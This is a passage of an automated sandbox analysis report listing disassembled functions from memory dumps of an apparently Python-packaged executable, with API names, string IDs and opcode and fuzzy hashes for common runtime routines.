                                                                                                                                                                                                            Function 00007FF7ACEA6F9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                            • Opcode ID: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction ID: d918e8db599752cf29f9031b10db7a9b60d58ced6bfa92792ba38df8122a5c67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11B132B1DB419AE750AB02E854339F2A0FB88BE5F854234DA1DA77A4CF3CD9548710
                                                                                                                                                                                                            Function 00007FF8A7FF1EB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$AttrErr_ImportImport_ModuleNoneObject_String
                                                                                                                                                                                                            • String ID: UnsupportedOperation
                                                                                                                                                                                                            • API String ID: 984930576-3339004128
                                                                                                                                                                                                            • Opcode ID: 339b4378c8d7f0ae21abf7204bd6bee0c54fc0e9b5e9f5dd2cf395117315f77f
                                                                                                                                                                                                            • Instruction ID: b77dd82fa23798dfe21f992cd61467b99c55834c191dd9b69005da913ee30e65
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 339b4378c8d7f0ae21abf7204bd6bee0c54fc0e9b5e9f5dd2cf395117315f77f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0F03A21E1BF43A2EF189F65A95913C63A1EF65BD1F080035DA1E063E4EF3CE1A59324
                                                                                                                                                                                                            Function 00007FF8A801D9D0 Relevance: 10.3, APIs: 8, Instructions: 267COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSectionfreemallocmemset$EnterLeave
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2095983230-0
                                                                                                                                                                                                            • Opcode ID: b998347c00ed0ece3a0776c08e73774095dc386f363ecd7911bcd7741898d21f
                                                                                                                                                                                                            • Instruction ID: e860caef3ba4ded67d5e5e75629b692b5ada72b735f30d73d2cda26d23c7b1c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b998347c00ed0ece3a0776c08e73774095dc386f363ecd7911bcd7741898d21f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FD14132A19B85D7EA69CF35E5403A9B3A0FB99794F049625DF9E03651DF38F1A0C700
                                                                                                                                                                                                            Function 00007FF8A81822C0 Relevance: 9.2, APIs: 6, Instructions: 155COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2059522720-0
                                                                                                                                                                                                            • Opcode ID: 448076783abad2c2f56cfc3b1ac18c58d7ec552c2373f9e72f70daef34c05903
                                                                                                                                                                                                            • Instruction ID: a09bae998e01fd89f2d5ef691dbc7b77e9d85c79c382018359ebb7044559ae20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 448076783abad2c2f56cfc3b1ac18c58d7ec552c2373f9e72f70daef34c05903
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99615872605B9592EA62CF12E8557AAB3A8FB68BC0F494435DF8E47B54EF7CD080C314
                                                                                                                                                                                                            Function 00007FF8A8184570 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2059522720-0
                                                                                                                                                                                                            • Opcode ID: 106ad08137d43433c8a47fb976de357f67351b8c3d41f25302bf9f32669dde97
                                                                                                                                                                                                            • Instruction ID: 8213592d30b113dcfb1bfb588e92077cd85c14a605437658d01f92320e0fe2ad
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 106ad08137d43433c8a47fb976de357f67351b8c3d41f25302bf9f32669dde97
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3512772606B4192EA66CF22F9453AAB3A5FB58BC4F184435DF8E47B54EF38D094C314
                                                                                                                                                                                                            Function 00007FF8A8183A10 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2059522720-0
                                                                                                                                                                                                            • Opcode ID: 375e5fb19d9a9dc860e8f094b7fa81057e77484c4285913346ea9240ab0dd256
                                                                                                                                                                                                            • Instruction ID: 3b14d5e200abc6fbca29670cbfb68250b6faeb604a0f76a1811f3d010a2fc83b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 375e5fb19d9a9dc860e8f094b7fa81057e77484c4285913346ea9240ab0dd256
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9514AB2606B4196DB26CF16E9413AAB3A4FB48BC4F084535DF8E47B54EF38D494C314
                                                                                                                                                                                                            Function 00007FF8A801BC10 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalInitializeSection$ConditionDeleteVariablecallocfreememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 809434779-0
                                                                                                                                                                                                            • Opcode ID: 1a8a21b372d51531e8062ffac121eb9cd687b71fd50626a22ec10a5d4a5afbfc
                                                                                                                                                                                                            • Instruction ID: ac9ac9986e1f8cf0ae9dc7b87ab353ab13b9a2f81985df8182586b56f2201e57
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a8a21b372d51531e8062ffac121eb9cd687b71fd50626a22ec10a5d4a5afbfc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C351BE22A1AB45D2EF55DF25A45027963A0FF88BE8F044634EE8D077C8EF3CE5618764
                                                                                                                                                                                                            Function 00007FF8A7E71D40 Relevance: 9.1, APIs: 6, Instructions: 111COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285204631.00007FF8A7E70000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285237784.00007FF8A7E73000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285254997.00007FF8A7E74000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285271778.00007FF8A7E75000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _aligned_free_aligned_malloc$callocfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2511558924-0
                                                                                                                                                                                                            • Opcode ID: f863dc1586e3cf16cebe835e06b4d062ebca0d396c65d4d1fe2481ee9152230e
                                                                                                                                                                                                            • Instruction ID: fb2d2566752b0ca3a67d57ed34bd2cdf4e5d4adbed99219490b71a72be719bab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f863dc1586e3cf16cebe835e06b4d062ebca0d396c65d4d1fe2481ee9152230e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B413676A0AB42A6EA61CF41E85037D73A5FB88BD1F040535CE4D47B94EF7CE8A5A700
                                                                                                                                                                                                            Function 00007FF8A801C720 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalInitializeSection$ConditionDeleteVariablecallocfreememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 809434779-0
                                                                                                                                                                                                            • Opcode ID: ad5e4b6b3bd83992a7fd0a4a6533c00dcf08d0fa00773c0a5b39563c065f4594
                                                                                                                                                                                                            • Instruction ID: a6cc8853f86e5ad3a25c4c815a68793a59a759b943fc33432d9a9db1743307e2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad5e4b6b3bd83992a7fd0a4a6533c00dcf08d0fa00773c0a5b39563c065f4594
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1318C26A1AB82DAEB54DF25E4403AAA3A0FB88BD4F094031DA4E17794DF3CE4958754
                                                                                                                                                                                                            Function 00007FF7ACE9A6C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A6D7
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A70D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A73A
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A74B
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A75C
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A777
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: 06987274cb3614921fd840648349c1e43a66a502bcd42809fc0a8605467304b5
                                                                                                                                                                                                            • Instruction ID: 9e584828cc27954eba3c7436f5a115f7a9254a177db9df97f1ba97c328b33439
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06987274cb3614921fd840648349c1e43a66a502bcd42809fc0a8605467304b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92118E30A0E34262FA1477215646139E2925F447F0F864374F93E7B7F6EE2CE8518621
                                                                                                                                                                                                            Function 00007FF7ACE8E3A4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                            • API String ID: 851805269-3733052814
                                                                                                                                                                                                            • Opcode ID: 9800ab22ff9ec3031df11c68b1b6988b1d6dca39287b35c2ac61cac3dceebb2d
                                                                                                                                                                                                            • Instruction ID: 149e98c7fb8f21e79a5be1d6a6042506824430c6e169af427ea137f6122ce8bf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9800ab22ff9ec3031df11c68b1b6988b1d6dca39287b35c2ac61cac3dceebb2d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E61033690D6C2A6EB34AF11D640278B7A0FB44B96F854171DA6C67BE5DF3CE4A0C710
                                                                                                                                                                                                            Function 00007FF8A800F320 Relevance: 8.9, APIs: 7, Instructions: 158COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: 121d7170a03c3b4f46083bdbca4aafbc00543ab43fa49f6b59625527858e5c3e
                                                                                                                                                                                                            • Instruction ID: dad5308d66e90620c0f50a924f6840da30e7ee22b9ba7b549ac861afafcb4c60
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 121d7170a03c3b4f46083bdbca4aafbc00543ab43fa49f6b59625527858e5c3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4616022A0AB8596EE65DF25A4402AA6360FF85BE1F084335DFAD177C4DF3CF1619314
                                                                                                                                                                                                            Function 00007FF7ACE8C7E8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                                            • Opcode ID: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction ID: 5fee9a97739454e2354908f6f28e05c8ea2689a6e792ba32351f65357aa05bc4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F951F333A0E682A6E714EF15E500A39B395FB41B89F929171DA4F23758DF3CE841C710
                                                                                                                                                                                                            Function 00007FF7ACE82240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                            • Opcode ID: 7d82fb9080f08f38887541d796cd93f6b84f8101b6940601e1502b8de02da7d5
